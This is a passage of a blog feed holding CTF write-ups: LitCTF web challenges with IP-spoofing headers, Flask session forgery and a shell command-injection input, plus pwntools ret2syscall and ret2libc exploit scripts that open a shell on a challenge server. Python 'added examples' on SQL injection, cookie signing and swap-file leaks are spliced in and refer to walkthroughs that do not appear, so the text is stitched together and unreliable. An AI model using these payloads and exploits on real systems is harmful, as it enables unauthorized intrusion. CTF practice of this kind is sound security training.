class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs php">X-Forwarded: 127.0.0.1<br>X-Forwarded-For: 127.0.0.1<br>Forwarded-For: 127.0.0.1<br>Forwarded: 127.0.0.1<br>X-Requested-With: 127.0.<span 
class="hljs-number">0.1</span><br>X-Forwarded-Proto: 127.0.0.1<br>X-Forwarded-Host: 127.0.0.1<br>X-remote-IP: 127.0.0.1<br>X-remote-addr: 127.0.0.1<br>True-Client-IP: 127.0.0.1<br>X-Client-IP: 127.0.0.1<br>Client-IP: 127.0.0.1<br>X-Real-IP: 127.0.0.1<br>Ali-CDN-Real-IP: 127.0.0.1<br>Cdn-Src-Ip: 127.0.0.1<br>Cdn-Real-Ip: 127.0.0.1<br>CF-Connecting-IP: 127.0.0.1<br>X-Cluster-Client-IP: 127.0.0.1<br>WL-Proxy-Client-IP: 127.0.0.1<br>Proxy-Client-IP: 127.0.0.1<br>Fastly-Client-Ip: 127.0.0.1<br>True-Client-Ip: 127.0.0.1<br>X-Originating-IP: 127.0.0.1<br>X-Host: 127.0.0.1<br>X-Custom-IP-Authorization: 127.0.0.1<br></code></pre></td></tr></table></figure><p>The local address, sent as client-ip: 
127.0.0.1</p><p>The referring site, sent as referer: pornhub.com</p><p>The required browser, sent as user-agent: Chrome</p><p>The proxy, sent as via: Clash.win</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.73yrqln52y00.webp"></p><p>Once you reach this page, view the source and you can see where the flag is.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.3xfl93ctnwu0.webp"></p><h2 id="LitCTF-2023-1zjs"><a href="#LitCTF-2023-1zjs" class="headerlink" title="[LitCTF 2023]1zjs"></a>[LitCTF 2023]1zjs</h2><p>Go straight to the source view and find the JS file; it points to a PHP file full of JSFuck text. Just decode it.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.1rcn1dvd618g.webp"></p><p>Since it is JavaScript, you can evaluate it directly in the browser console to get the output.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.4yqn0mb2fi00.webp"></p><h2 id="LitCTF-2023-Flag点击就送!"><a href="#LitCTF-2023-Flag点击就送!" class="headerlink" title="[LitCTF 2023]Flag点击就送!"></a>[LitCTF 2023]Flag点击就送!</h2><p>A session-forgery challenge.</p><p>Type some text and press Enter, then go on to request the flag; the site tells us only the administrator can get it.</p><p>Capturing the traffic in Burp shows a cookie being returned, and the challenge says only admin can take the flag.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.61623zag7co0.png"></p><p>Forging a session requires the secret key. In most challenges the key has to be found somewhere in the challenge itself, but in this one it is guessed: key='litctf'.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">decode: python3 flask_session_cookie_manager3.py decode -s "密钥" -c "session"<br><br>encode: python3 flask_session_cookie_manager3.py encode -s "密钥" -t "上面解密出的一串字符串"<br></code></pre></td></tr></table></figure><p>With the key, decode the cookie first: the decoded session has name '111'. Per the challenge, change it to 'admin' and re-encode.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.27nvnjo9nyo0.webp"></p><p>Send the forged cookie with Burp to get the flag.</p><p><img 
src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.2eee9dgxxog0.webp"></p><h2 id="LitCTF-2023-Ping"><a href="#LitCTF-2023-Ping" class="headerlink" title="[LitCTF 2023]Ping"></a>[LitCTF 2023]Ping</h2><p>Looking at the page source first, there is a regular-expression check on the input.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.64n0c8tf0240.webp"></p><p>So there are two approaches. The first is simply to disable JavaScript, since the check only runs in the browser.</p><p>Press F12 then F1 to disable it, then submit 1.1.1.1 || (ls /)(cat /flag) directly.</p><p>This relies on the Linux shell's command-chaining operators:</p><figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs 1c">&  runs the task in the background; e.g. to run redis-server in the background: redis-server &<br><br>&& runs the next command only if the previous one succeeded; e.g. echo '1' && echo '2'<br><br>|  is a pipe: the previous command's output becomes the next command's input; e.g. echo 'yes' | wc -l<br><br>|| runs the next command only if the previous one failed; e.g. cat nofile || echo "fail"<br></code></pre></td></tr></table></figure><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.7fx5n2h64yo0.webp"></p><p>The second method is to intercept the request with Burp and modify it there directly.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.1g5mkbhr9g5c.webp"></p>]]></content>
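The SQL-injection walkthrough above (steps 1 to 14), as an added example that is not part of the original post: a Python script that reproduces the vulnerable query shape (the user value concatenated inside six nested parentheses, which is what the 1)))))) prefix closes) and runs the write-up's union payloads against a constructed SQLite database standing in for MySQL, beside the parameterized version of the same query. Because SQLite has no information_schema, sqlite_master takes its place, and the payload ends in "-- " instead of "#" since SQLite does not treat "#" as a comment. The table names, rows and the users table are all constructed.

```python
import sqlite3


def make_db():
    # Constructed sample data (not the challenge's); SQLite stands in for MySQL.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "INSERT INTO news VALUES (1, 'Welcome', 'first post');"
        "INSERT INTO news VALUES (2, 'Update', 'second post');"
        "CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);"
        "INSERT INTO users VALUES (1, 'admin', 'constructed-secret');"
    )
    return conn


def lookup_vulnerable(conn, user_id):
    # The untrusted value is pasted into the SQL text inside six nested
    # parentheses. A value starting with "1))))))" closes every open bracket,
    # so "and 1=2 union select ..." that follows becomes part of the statement.
    sql = "SELECT title, body FROM news WHERE ((((((id = %s))))))" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Same query with a bound parameter: the value is compared as data and
    # never parsed as SQL, so the brackets and the UNION stay inert.
    sql = "SELECT title, body FROM news WHERE ((((((id = ?))))))"
    return conn.execute(sql, (user_id,)).fetchall()


# Steps 4/5 of the write-up (list the tables), adapted to SQLite's catalog.
TABLES_PAYLOAD = ("1)))))) and 1=2 union select 1, group_concat(name) "
                  "from sqlite_master where type='table' -- ")
# Step 8 (dump one column of a table), adapted to the constructed users table.
PASSWORDS_PAYLOAD = ("1)))))) and 1=2 union select 1, group_concat(password) "
                     "from users -- ")


def demo():
    conn = make_db()
    return {
        "normal": lookup_vulnerable(conn, 1),
        "tables_leaked": lookup_vulnerable(conn, TABLES_PAYLOAD),
        "passwords_leaked": lookup_vulnerable(conn, PASSWORDS_PAYLOAD),
        "safe_normal": lookup_safe(conn, 1),
        "safe_attacked": lookup_safe(conn, TABLES_PAYLOAD),
    }


if __name__ == "__main__":
    for key, rows in demo().items():
        print(key, rows)
```

The "and 1=2" behaves exactly as described in step 2: the original WHERE clause matches nothing, so the only row the page renders is the one the injected SELECT contributes. With the bound parameter the same payload simply fails to match any id and the query returns no rows.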
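The session-forgery challenge above turns entirely on the secret key being guessable ('litctf'). The following is an added illustration, not code from the original post and not Flask's real itsdangerous format: a simplified signed cookie (base64 JSON plus an HMAC-SHA256 tag, with a constructed salt) showing that anyone who holds the key can mint a name=admin session, that the same forgery is rejected by a server whose key is random, and that editing the payload without re-signing fails verification.

```python
import base64
import hashlib
import hmac
import json
import secrets

SALT = b"cookie-session"  # constructed salt, only to mirror the idea of a keyed salt


def _mac(secret, data):
    # Derive a per-purpose key from the secret, then tag the payload with it.
    key = hmac.new(secret.encode(), SALT, hashlib.sha256).digest()
    tag = hmac.new(key, data, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(tag).rstrip(b"=")


def encode_session(secret, session):
    data = base64.urlsafe_b64encode(
        json.dumps(session, sort_keys=True).encode()).rstrip(b"=")
    return (data + b"." + _mac(secret, data)).decode()


def decode_session(secret, cookie):
    # Returns the session dict if the tag verifies, None otherwise.
    data, _, sig = cookie.encode().rpartition(b".")
    if not hmac.compare_digest(sig, _mac(secret, data)):
        return None
    padded = data + b"=" * (-len(data) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def is_admin(secret, cookie):
    session = decode_session(secret, cookie)
    return session is not None and session.get("name") == "admin"


def demo():
    weak = "litctf"                 # the guessable key from the write-up
    strong = secrets.token_hex(32)  # what a server should generate instead
    cookie = encode_session(weak, {"name": "111"})
    forged = encode_session(weak, {"name": "admin"})
    # Splice the admin payload onto the signature of the legitimate cookie.
    tampered = forged.split(".")[0] + "." + cookie.split(".")[1]
    return {
        "decoded": decode_session(weak, cookie),
        "forged_accepted_with_weak_key": is_admin(weak, forged),
        "forged_rejected_with_strong_key": is_admin(strong, forged),
        "tampered_rejected": decode_session(weak, tampered),
    }


if __name__ == "__main__":
    print(demo())
```

The cookie format itself is not the weakness: the tag is sound as long as the key is secret and unguessable, which is why the fix is a long random secret rather than a different encoding of the session.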
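The Ping challenge and the operator table above, as an added example that is not the challenge's own PHP: a Python handler that shows why a client-side regex is no defence (the value still reaches the shell as text, and the shell splits "||" into its own word) and what the server-side fix looks like: accept only an IP literal, and pass it as a single argv element so no shell is involved. The function names and the accepted-IP-only policy are this example's own choices.

```python
import ipaddress
import shlex

INJECTED = "1.1.1.1 || (ls /)(cat /flag)"   # the input from the write-up


def build_vulnerable(host):
    # Mirrors system("ping -c 1 " . $host): the whole string is handed to /bin/sh.
    return "ping -c 1 " + host


def shell_tokens(command):
    # What the shell would parse: "||" becomes its own word, so everything
    # after it is a second command, not an argument to ping.
    return shlex.split(command)


def ping_argv(host):
    # Allow-list: a syntactically valid IPv4/IPv6 literal and nothing else.
    # Passing the result as a list to subprocess.run never invokes a shell,
    # so |, ||, ;, backticks and $(...) have no meaning at all.
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError("not an IP address: %r" % host)
    return ["ping", "-c", "1", str(addr)]


def handle_request(host):
    # Returns (accepted, argv_or_reason): the shape a request handler would log.
    try:
        return True, ping_argv(host)
    except ValueError as e:
        return False, str(e)


if __name__ == "__main__":
    print(shell_tokens(build_vulnerable(INJECTED)))
    print(handle_request("1.1.1.1"))
    print(handle_request(INJECTED))
```

If hostnames must be supported as well, validate them against the DNS label grammar before use; the point is that the check happens on the server and the value never becomes shell syntax.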
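The Vim yyds challenge works because a .index.php.swp file was left in the web root. As an added example (not from the original post), here is the check a maintainer can run before deploying: walk the document root and report editor leftovers such as Vim swap files (.name.swp/.swo), tilde backups and .bak/.orig/.old copies. The pattern list and the constructed temporary web root are this example's own.

```python
import os
import re
import shutil
import tempfile

# File-name patterns that leak source when served from a web root.
LEFTOVER_PATTERNS = [
    re.compile(r"^\..+\.sw[a-z]$"),    # Vim swap: .index.php.swp
    re.compile(r".+~$"),               # Vim/Emacs backup: index.php~
    re.compile(r".+\.(bak|orig|old)$"),  # manual backup copies
]


def find_editor_leftovers(root):
    # Walk the tree and return sorted root-relative paths of matching files.
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if any(p.match(name) for p in LEFTOVER_PATTERNS):
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                found.append(rel.replace(os.sep, "/"))
    return sorted(found)


def demo():
    # Constructed web root: one real file and two leftovers.
    root = tempfile.mkdtemp()
    try:
        os.makedirs(os.path.join(root, "admin"))
        for rel in ["index.php", ".index.php.swp", "admin/config.php~"]:
            with open(os.path.join(root, rel), "w") as f:
                f.write("x")
        return find_editor_leftovers(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

The scan is a safety net, not a substitute for denying dotfiles and backup suffixes in the web server configuration, since a swap file can reappear the next time someone edits a file in place.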
<summary type="html"><h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><p><img src="/./../image/image-20231218132527404.png" alt="image-20231218132527404"></p>
<h2 id="LitCTF-2023-我Flag呢?"><a href="#LitCTF-2023-我Flag呢?" class="headerlink" title="[LitCTF 2023]我Flag呢?"></a>[LitCTF 2023]我Flag呢?</h2><p>After opening the environment, press F12 and the flag is right there in the page source.</p>
<p>Other ways to open the page source:</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">f12<span class="hljs-regexp">/ctrl+u/</span>view-<span class="hljs-keyword">source</span>:<br></code></pre></td></tr></table></figure>
<p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/%7B4038CD4C-5AD6-45cc-B79F-734765D74244%7D.74m3u0jfzps0.webp"></p></summary>
<category term="ctf" scheme="https://shenshuoyaoyouguangha.github.io/tags/ctf/"/>
<category term="Pwn" scheme="https://shenshuoyaoyouguangha.github.io/tags/Pwn/"/>
<category term="RE" scheme="https://shenshuoyaoyouguangha.github.io/tags/RE/"/>
<category term="litctf" scheme="https://shenshuoyaoyouguangha.github.io/tags/litctf/"/>
<category term="WEB" scheme="https://shenshuoyaoyouguangha.github.io/tags/WEB/"/>
</entry>
<entry>
<title>山石结营赛</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/08/20/%E5%B1%B1%E7%9F%B3%E7%BB%93%E8%90%A5%E8%B5%9B/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/08/20/%E5%B1%B1%E7%9F%B3%E7%BB%93%E8%90%A5%E8%B5%9B/</id>
<published>2023-08-19T16:15:19.000Z</published>
<updated>2023-08-19T17:21:58.329Z</updated>
<content type="html"><![CDATA[<h2 id="ret2syscall"><a href="#ret2syscall" class="headerlink" title="ret2syscall"></a>ret2syscall</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>, log_level=<span class="hljs-string">'debug'</span>)<br><br><span class="hljs-comment"># p = process('pwn')</span><br>p = remote(<span class="hljs-string">'58.240.236.231'</span>,<span class="hljs-number">49003</span>)<br><br><br>rdi = <span class="hljs-number">0x40072b</span><br>rsi = <span class="hljs-number">0x400735</span><br>rax = <span class="hljs-number">0x400721</span><br>syscall = <span class="hljs-number">0x400741</span><br>rdx = <span class="hljs-number">0x40073f</span><br>binsh = <span class="hljs-number">0x601048</span><br>payload = <span class="hljs-number">0x48</span>*<span class="hljs-string">b'a'</span>+ p64(rax) + p64(<span class="hljs-number">59</span>) + p64(rdi) + p64(<span class="hljs-number">0x601048</span>) + p64(rsi) + p64(<span class="hljs-number">0</span>) + p64(syscall)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure><span id="more"></span> <h2 id="ret2libc"><a href="#ret2libc" class="headerlink" 
title="ret2libc"></a>ret2libc</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><br>context(arch=<span class="hljs-string">'amd64'</span>, 
os='linux')<br>context.log_level = 'debug'<br><br># p = remote("58.240.236.231",49002)<br><br>p = process('./pwn123')<br><br>elf = ELF('./pwn123')<br><br>got_addr = elf.got['puts']<br><br>plt_addr = elf.plt['puts']<br><br>main_addr = elf.symbols['vul']<br><br>print(hex(main_addr))<br><br>pop_rdi = 0x0000000000400783<br><br>pop_rsi_r15 = 0x0000000000400781<br><br>payload = b'a'*0xD8 + p64(pop_rdi) + p64(got_addr) + p64(plt_addr) + p64(main_addr)<br># print(payload)<br><br>p.sendline(payload)<br><br># p.recvuntil('OK,Good!')<br><br>puts_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) # take the last 6 bytes of the leak (a little-endian address) and pad to 8 so u64 turns them into an unsigned 64-bit integer<br><br>print(hex(puts_addr))<br><br>libc = LibcSearcher("puts",puts_addr)<br><br>libcbase = puts_addr - libc.dump("puts") <br><br>system_addr = libcbase + libc.dump("system")<br><br>binsh_addr = libcbase + libc.dump("str_bin_sh")<br><br>ret_addr = 0x0000000000400509<br><br>payload2 = b'a'*0xD8 + p64(ret_addr) + p64(pop_rdi) + 
p64(binsh_addr) + p64(system_addr)<br><br>p.sendline(payload2)<br><br>p.interactive()<br></code></pre></td></tr></table></figure><h2 id="git"><a href="#git" class="headerlink" title="git"></a>git</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Shell">?is=flag&flag=flag<br></code></pre></td></tr></table></figure><h2 id="HSAndroid1"><a href="#HSAndroid1" class="headerlink" title="HSAndroid1"></a>HSAndroid1</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python">flag_chars = list("0db530c0e9752357b1ae4cf7ea8331ae")<br><br>for i in range(14, 0, -2):<br> for j in range(12, 0, -4):<br>  temp = flag_chars[j]<br>  flag_chars[j] = flag_chars[j - 4]<br>  flag_chars[j - 4] = temp<br> j2 = i - 1<br> temp2 = flag_chars[j2]<br> flag_chars[i - 1] = flag_chars[i - <span 
class="hljs-number">2</span>]<br> flag_chars[i - 2] = temp2<br><br>flag = "".join(flag_chars)<br>print("Decrypted Flag:", flag)<br></code></pre></td></tr></table></figure><h2 id="easyusb"><a href="#easyusb" class="headerlink" title="easyusb"></a>easyusb</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">tshark -T json -r usb.pcapng > test.json <br></code></pre></td></tr></table></figure><p>Extract the HID data from the capture; the records look like this:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs C">usbhid.data": "00:00:16:00:00:00:00:00"<br></code></pre></td></tr></table></figure><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs c">00:00:<span 
class="hljs-number">16</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">08</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">06</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">1f</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span 
class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">08</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">17</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">0</span>e:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span 
class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">20</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">1</span>c:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br></code></pre></td></tr></table></figure><p>Then I found a script online and ran it in one go.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code 
class="hljs Python">mappings = { <span class="hljs-number">0x04</span>:<span class="hljs-string">"A"</span>, <span class="hljs-number">0x05</span>:<span class="hljs-string">"B"</span>, <span class="hljs-number">0x06</span>:<span class="hljs-string">"C"</span>, <span class="hljs-number">0x07</span>:<span class="hljs-string">"D"</span>, <span class="hljs-number">0x08</span>:<span class="hljs-string">"E"</span>, <span class="hljs-number">0x09</span>:<span class="hljs-string">"F"</span>, <span class="hljs-number">0x0A</span>:<span class="hljs-string">"G"</span>, <span class="hljs-number">0x0B</span>:<span class="hljs-string">"H"</span>, <span class="hljs-number">0x0C</span>:<span class="hljs-string">"I"</span>, <span class="hljs-number">0x0D</span>:<span class="hljs-string">"J"</span>, <span class="hljs-number">0x0E</span>:<span class="hljs-string">"K"</span>, <span class="hljs-number">0x0F</span>:<span class="hljs-string">"L"</span>, <span class="hljs-number">0x10</span>:<span class="hljs-string">"M"</span>, <span class="hljs-number">0x11</span>:<span class="hljs-string">"N"</span>,<span class="hljs-number">0x12</span>:<span class="hljs-string">"O"</span>, <span class="hljs-number">0x13</span>:<span class="hljs-string">"P"</span>, <span class="hljs-number">0x14</span>:<span class="hljs-string">"Q"</span>, <span class="hljs-number">0x15</span>:<span class="hljs-string">"R"</span>, <span class="hljs-number">0x16</span>:<span class="hljs-string">"S"</span>, <span class="hljs-number">0x17</span>:<span class="hljs-string">"T"</span>, <span class="hljs-number">0x18</span>:<span class="hljs-string">"U"</span>,<span class="hljs-number">0x19</span>:<span class="hljs-string">"V"</span>, <span class="hljs-number">0x1A</span>:<span class="hljs-string">"W"</span>, <span class="hljs-number">0x1B</span>:<span class="hljs-string">"X"</span>, <span class="hljs-number">0x1C</span>:<span class="hljs-string">"Y"</span>, <span class="hljs-number">0x1D</span>:<span 
class="hljs-string">"Z"</span>, <span class="hljs-number">0x1E</span>:<span class="hljs-string">"1"</span>, <span class="hljs-number">0x1F</span>:<span class="hljs-string">"2"</span>, <span class="hljs-number">0x20</span>:<span class="hljs-string">"3"</span>, <span class="hljs-number">0x21</span>:<span class="hljs-string">"4"</span>, <span class="hljs-number">0x22</span>:<span class="hljs-string">"5"</span>, <span class="hljs-number">0x23</span>:<span class="hljs-string">"6"</span>, <span class="hljs-number">0x24</span>:<span class="hljs-string">"7"</span>, <span class="hljs-number">0x25</span>:<span class="hljs-string">"8"</span>, <span class="hljs-number">0x26</span>:<span class="hljs-string">"9"</span>, <span class="hljs-number">0x27</span>:<span class="hljs-string">"0"</span>, <span class="hljs-number">0x28</span>:<span class="hljs-string">"\n"</span>, <span class="hljs-number">0x2a</span>:<span class="hljs-string">"[DEL]"</span>, <span class="hljs-number">0X2B</span>:<span class="hljs-string">" "</span>, <span class="hljs-number">0x2C</span>:<span class="hljs-string">" "</span>, <span class="hljs-number">0x2D</span>:<span class="hljs-string">"-"</span>, <span class="hljs-number">0x2E</span>:<span class="hljs-string">"="</span>, <span class="hljs-number">0x2F</span>:<span class="hljs-string">"["</span>, <span class="hljs-number">0x30</span>:<span class="hljs-string">"]"</span>, <span class="hljs-number">0x31</span>:<span class="hljs-string">"\\"</span>, <span class="hljs-number">0x32</span>:<span class="hljs-string">"~"</span>, <span class="hljs-number">0x33</span>:<span class="hljs-string">";"</span>, <span class="hljs-number">0x34</span>:<span class="hljs-string">"'"</span>, <span class="hljs-number">0x36</span>:<span class="hljs-string">","</span>, <span class="hljs-number">0x37</span>:<span class="hljs-string">"."</span> }<br>nums = []<br>keys = <span class="hljs-built_in">open</span>(<span class="hljs-string">'usbdata.txt'</span>)<br><span 
